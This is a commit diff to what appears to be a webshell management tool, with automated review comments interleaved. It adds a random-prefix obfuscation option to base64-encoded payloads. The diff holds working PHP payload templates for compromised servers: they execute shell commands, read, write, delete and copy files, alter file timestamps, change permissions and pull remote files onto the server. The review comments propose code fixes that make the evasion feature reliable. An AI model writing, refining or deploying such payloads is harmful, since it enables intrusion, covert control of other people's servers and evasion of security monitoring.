Commit 7e7720fc authored by yzddmr6's avatar yzddmr6

update

给其他参数增加随机前缀
parent 30f0dd1b
......@@ -129,7 +129,9 @@ class Base {
* @param {String} encode [字符串编码,默认utf8]
* @return {Object} [返回字符串处理函数对象]
*/
format(encode) {
format(opts) {
let encode=opts['encode'];
let randomPrefix= parseInt(opts.otherConf["random-Prefix"]);
return {
/**
* base64编码
......@@ -139,6 +141,20 @@ class Base {
base64(str) {
return Buffer.from(iconv.encode(Buffer.from(str), encode)).toString('base64');
},
/**
* 增加随机前缀的base64编码
* @param {String} str 字符串
* @return {String} 编码后的字符串
*/
newbase64(str) {
let randomString=(length)=>{
let chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
let result = '';
for (let i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)];
return result;
}
return randomString(randomPrefix)+Buffer.from(iconv.encode(Buffer.from(str), encode)).toString('base64');
},
/**
* 字符串转16进制(不进行编码转换
* @param {String} str 转换的字符串
......@@ -175,10 +191,9 @@ class Base {
// 加载模板
let _argv = this.argv();
let templateObj = require(`${tpl}`)(_argv[0], _argv[1], _argv[2], _argv[3], _argv[4], _argv[5]);
// let formatter = new this.format(this.__opts__['encode']);
let formatter = Base
.prototype
.format(this.__opts__['encode']);
.format(this.__opts__);
// 解析模板
for (let funcName in templateObj) {
this[templateName][funcName] = ((args) => {
......@@ -211,6 +226,7 @@ class Base {
})
}
// 发送HTTP请求
data['_']=data['_'].replace(/#randomPrefix#/g,this.__opts__.otherConf["random-Prefix"]);
return data;
}
} else {
......@@ -331,6 +347,7 @@ class Base {
chunkStepMax: (this.__opts__['otherConf'] || {})['chunk-step-byte-max'] || 3,
useMultipart: (this.__opts__['otherConf'] || {})['use-multipart'] === 1,
addMassData: (this.__opts__['otherConf'] || {})['add-MassData'] === 1,
randomPrefix: parseInt((this.__opts__['otherConf'] || {})['random-Prefix']),
useRandomVariable: (this.__opts__['otherConf'] || {})['use-random-variable'] === 1,
timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
headers: (this.__opts__['httpConf'] || {})['headers'] || {},
......@@ -384,6 +401,7 @@ class Base {
chunkStepMax: (this.__opts__['otherConf'] || {})['chunk-step-byte-max'] || 3,
useMultipart: (this.__opts__['otherConf'] || {})['use-multipart'] === 1,
addMassData: (this.__opts__['otherConf'] || {})['add-MassData'] === 1,
randomPrefix: parseInt((this.__opts__['otherConf'] || {})['random-Prefix']),
useRandomVariable: (this.__opts__['otherConf'] || {})['use-random-variable'] === 1,
timeout: parseInt((this.__opts__['otherConf'] || {})['request-timeout']),
headers: (this.__opts__['httpConf'] || {})['headers'] || {},
......
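Review bot: `format(opts)` reads `opts.otherConf["random-Prefix"]` without the `|| {}` guard that the request-option hunks further down use for the same key, so a configuration with no `otherConf` would throw here, and a missing or non-numeric value makes `parseInt` return `NaN`. In that case `newbase64` prepends nothing (the loop never runs) while the later `replace(/#randomPrefix#/g, …)` still writes the raw setting into the template, so encoder and template disagree on the offset and an unvalidated string lands inside the generated PHP source. Parse and validate once, e.g. `const randomPrefix = Number.parseInt((opts.otherConf || {})['random-Prefix'], 10) || 0;`, and substitute that same number in the `#randomPrefix#` replace. The JSDoc above `format` still documents `@param {String} encode` although the parameter is now `opts`. The enclosing methods start and end outside these hunks.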
......@@ -4,9 +4,9 @@
module.exports = (arg1, arg2, arg3) => ({
exec: {
_: `$p=base64_decode($_POST["${arg1}"]);
$s=base64_decode($_POST["${arg2}"]);
$envstr=@base64_decode($_POST["${arg3}"]);
_: `$p=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));
$s=base64_decode(substr($_POST["${arg2}"],#randomPrefix#));
$envstr=@base64_decode(substr($_POST["${arg3}"],#randomPrefix#));
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";
if(substr($d,0,1)=="/"){
......@@ -102,20 +102,20 @@ module.exports = (arg1, arg2, arg3) => ({
};
$ret=@runcmd($r." 2>&1");
print ($ret!=0)?"ret={$ret}":"";`.replace(/\n\s+/g, ''),
[arg1]: "#{base64::bin}",
[arg2]: "#{base64::cmd}",
[arg3]: "#{base64::env}"
[arg1]: "#{newbase64::bin}",
[arg2]: "#{newbase64::cmd}",
[arg3]: "#{newbase64::env}"
},
listcmd: {
_: `$arr=explode(",",base64_decode($_POST["${arg1}"]));
_: `$arr=explode(",",base64_decode(substr($_POST["${arg1}"],#randomPrefix#)));
foreach($arr as $v){
echo($v."\t".(file_exists($v)?"1":"0")."\n");
}`.replace(/\n\s+/g, ''),
[arg1]: "#{base64::binarr}"
[arg1]: "#{newbase64::binarr}"
},
quote: {
_: `$p=base64_decode($_POST["${arg1}"]);$s=base64_decode($_POST["${arg2}"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";echo \`{$r} 2>&1\``,
[arg1]: "#{base64::bin}",
[arg2]: "#{base64::cmd}"
_: `$p=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$s=base64_decode(substr($_POST["${arg2}"],#randomPrefix#));$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";$r="{$p} {$c}";echo \`{$r} 2>&1\``,
[arg1]: "#{newbase64::bin}",
[arg2]: "#{newbase64::cmd}"
}
})
\ No newline at end of file
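Review bot: The `#randomPrefix#` token in these template strings is undocumented, and the strings are not valid PHP until something replaces it; judging by the visible `Base` hunk, that happens in a global `replace` on `data['_']` just before the data is returned. A short header comment such as `// #randomPrefix#: placeholder for the configured prefix length, substituted by Base before the template is used` would make that contract explicit here and in the file-manager template, which uses the same token. Since the field mappings move from `base64::` to `newbase64::` in the same change, the comment should also say that the two must be changed together, because the template skips exactly as many characters as the formatter prepends.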
......@@ -4,69 +4,69 @@
module.exports = (arg1, arg2, arg3) => ({
dir: {
_: `$D=base64_decode($_POST["${arg1}"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}`,
[arg1]: "#{base64::path}"
_: `$D=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}`,
[arg1]: "#{newbase64::path}"
},
delete: {
_: `function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=base64_decode(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}`,
[arg1]: "#{base64::path}"
_: `function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}`,
[arg1]: "#{newbase64::path}"
},
create_file: {
_: `echo @fwrite(fopen(base64_decode($_POST["${arg1}"]),"w"),base64_decode($_POST["${arg2}"]))?"1":"0";`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::content}"
_: `echo @fwrite(fopen(base64_decode(substr($_POST["${arg1}"],#randomPrefix#)),"w"),base64_decode(substr($_POST["${arg2}"],#randomPrefix#)))?"1":"0";`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::content}"
},
read_file: {
_: `$F=base64_decode($_POST["${arg1}"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);`,
[arg1]: "#{base64::path}"
_: `$F=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);`,
[arg1]: "#{newbase64::path}"
},
copy: {
_: `$m=get_magic_quotes_gpc();$fc=base64_decode($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$fp=base64_decode($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);function xcopy($src,$dest){if(is_file($src)){if(!copy($src,$dest))return false;else return true;}$m=@dir($src);if(!is_dir($dest))if(!@mkdir($dest))return false;while($f=$m->read()){$isrc=$src.chr(47).$f;$idest=$dest.chr(47).$f;if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){if(!xcopy($isrc,$idest))return false;}else if(is_file($isrc)){if(!copy($isrc,$idest))return false;}}return true;}echo(xcopy($fc,$fp)?"1":"0");`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::target}"
_: `$m=get_magic_quotes_gpc();$fc=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$fp=base64_decode(substr($m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));function xcopy($src,$dest){if(is_file($src)){if(!copy($src,$dest))return false;else return true;}$m=@dir($src);if(!is_dir($dest))if(!@mkdir($dest))return false;while($f=$m->read()){$isrc=$src.chr(47).$f;$idest=$dest.chr(47).$f;if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){if(!xcopy($isrc,$idest))return false;}else if(is_file($isrc)){if(!copy($isrc,$idest))return false;}}return true;}echo(xcopy($fc,$fp)?"1":"0");`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::target}"
},
download_file: {
_: `$F=base64_decode(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");}`,
[arg1]: "#{base64::path}"
_: `$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");}`,
[arg1]: "#{newbase64::path}"
},
upload_file: {
_: `$f=base64_decode($_POST["${arg1}"]);$c=$_POST["${arg2}"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");`,
[arg1]: "#{base64::path}",
_: `$f=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$c=$_POST["${arg2}"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{buffer::content}"
},
rename: {
_: `$m=get_magic_quotes_gpc();$src=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$dst=base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);echo(rename($src,$dst)?"1":"0");`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::name}"
_: `$m=get_magic_quotes_gpc();$src=base64_decode(substr(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$dst=base64_decode(substr(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));echo(rename($src,$dst)?"1":"0");`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::name}"
},
retime: {
_: `$m=get_magic_quotes_gpc();$FN=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$TM=strtotime(base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]));if(file_exists($FN)){echo(@touch($FN,$TM,$TM)?"1":"0");}else{echo("0");};`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::time}"
_: `$m=get_magic_quotes_gpc();$FN=base64_decode(substr(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$TM=strtotime(base64_decode(substr(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]),#randomPrefix#));if(file_exists($FN)){echo(@touch($FN,$TM,$TM)?"1":"0");}else{echo("0");};`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::time}"
},
chmod: {
_: `$m=get_magic_quotes_gpc();$FN=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$mode=base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);echo(chmod($FN,octdec($mode))?"1":"0");`,
[arg1]: "#{base64::path}",
[arg2]: "#{base64::mode}"
_: `$m=get_magic_quotes_gpc();$FN=base64_decode(substr(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));$mode=base64_decode(substr(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"],#randomPrefix#));echo(chmod($FN,octdec($mode))?"1":"0");`,
[arg1]: "#{newbase64::path}",
[arg2]: "#{newbase64::mode}"
},
mkdir: {
_: `$m=get_magic_quotes_gpc();$f=base64_decode($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);echo(mkdir($f)?"1":"0");`,
[arg1]: "#{base64::path}"
_: `$m=get_magic_quotes_gpc();$f=base64_decode(substr($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"],#randomPrefix#));echo(mkdir($f)?"1":"0");`,
[arg1]: "#{newbase64::path}"
},
wget: {
_: `$fR=base64_decode($_POST["${arg1}"]);$fL=base64_decode($_POST["${arg2}"]);$F=@fopen($fR,chr(114));$L=@fopen($fL,chr(119));if($F && $L){while(!feof($F))@fwrite($L,@fgetc($F));@fclose($F);@fclose($L);echo("1");}else{echo("0");};`,
[arg1]: "#{base64::url}",
[arg2]: "#{base64::path}"
_: `$fR=base64_decode(substr($_POST["${arg1}"],#randomPrefix#));$fL=base64_decode(substr($_POST["${arg2}"],#randomPrefix#));$F=@fopen($fR,chr(114));$L=@fopen($fL,chr(119));if($F && $L){while(!feof($F))@fwrite($L,@fgetc($F));@fclose($F);@fclose($L);echo("1");}else{echo("0");};`,
[arg1]: "#{newbase64::url}",
[arg2]: "#{newbase64::path}"
}
})
\ No newline at end of file
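Review bot: In `retime` the second `substr(` is closed before the offset (`…$_POST["${arg2}"]),#randomPrefix#)`), so the number is handed to `base64_decode` as its second argument and `substr` is left with a single argument; every other template in this file keeps the offset inside `substr(…,#randomPrefix#)`. The rewritten `rename`, `retime` and `chmod` lines also carry over the bare `m?` although the first statement of each assigns `$m`, so the magic-quotes branch does not test the variable that was just set. Both are worth correcting while these lines are being touched, so that all entries in the file follow one pattern.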
......@@ -177,6 +177,7 @@ module.exports = {
nohttps: 'Ignore HTTPS certificate',
usemultipart: 'Use Multipart send payload',
addMassData: 'Add garbage data in payload',
randomPrefix: 'Random prefix length',
userandomvariable: 'Use random English word variables',
chunk: {
title: 'Chunked Transfer (Experimentally)',
......
......@@ -180,6 +180,7 @@ module.exports = {
usemultipart: '使用 Multipart 发包',
userandomvariable: '使用随机英文单词变量',
addMassData: '增加垃圾数据',
randomPrefix: '随机前缀长度',
chunk: {
title: '分块传输(实验性功能)',
usechunk: '开启分块传输发包',
......
......@@ -178,6 +178,7 @@ module.exports = {
nohttps: '忽略HTTPS證書',
usemultipart: '使用 Multipart 發包',
addMassData: '增加垃圾數據',
randomPrefix: '隨機前綴長度',
userandomvariable: '使用隨機英文單詞變量',
chunk: {
title: '分塊傳輸(實驗性功能)',
......
......@@ -178,6 +178,7 @@ module.exports = {
nohttps: '忽略HTTPS證書',
usemultipart: '使用 Multipart 發包',
addMassData: '增加垃圾數據',
randomPrefix: '隨機前綴長度',
userandomvariable: '使用隨機英文單詞變量',
chunk: {
title: '分塊傳輸(實驗性功能)',
......
......@@ -28,7 +28,8 @@ class ADefault {
others: {
"ignore-https": 0,
"use-random-variable": 0,
"request-timeout": '10000'
"request-timeout": '10000',
"random-Prefix": '2'
}
},
terminal: {
......
......@@ -467,6 +467,7 @@ class Form {
'ignore-https': 0,
'use-multipart': 0,
'add-MassData': 0,
'random-Prefix': '2',
'use-random-variable': 0,
'use-chunk': 0,
'chunk-step-byte-min': 2,
......@@ -608,9 +609,32 @@ class Form {
name: 'filemanager-cache',
label: LANG['list']['otherConf']['filemanagerCache'],
checked: opt['filemanager-cache'] === 1
}, {
type: "label",
label: LANG['list']['otherConf']['randomPrefix']
}, {
type: "combo",
inputWidth: 100,
name: "random-Prefix",
options: ((items) => {
let ret = [];
// 如果自定义的路径不在items里,则++
if (items.indexOf(opt['random-Prefix']) === -1) {
items.unshift(opt['random-Prefix']);
}
items.map((_) => {
ret.push({
text: _,
value: _,
selected: opt['random-Prefix'] === _
})
});
return ret;
})(['1', '2', '3', '5','10','15'])
}, {
type: "label",
label: LANG['list']['otherConf']['uploadFragment']
}, {
type: "combo",
label: '/kb',
......
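Review bot: The options builder for `random-Prefix` calls `items.map` only for its side effect of pushing into `ret`, and its comment still talks about a custom path ("如果自定义的路径不在items里"), which looks copied from another combo. Returning the mapped array directly is shorter and drops the temporary: `return items.map((v) => ({ text: v, value: v, selected: opt['random-Prefix'] === v }));`, with the comment reworded to say that a saved value missing from the preset list is added to it. The comparison is strict against string presets, so a value stored as a number would be treated as custom and listed next to its string twin; normalising with `String(opt['random-Prefix'])` first avoids that. The surrounding form definition starts and ends outside this hunk.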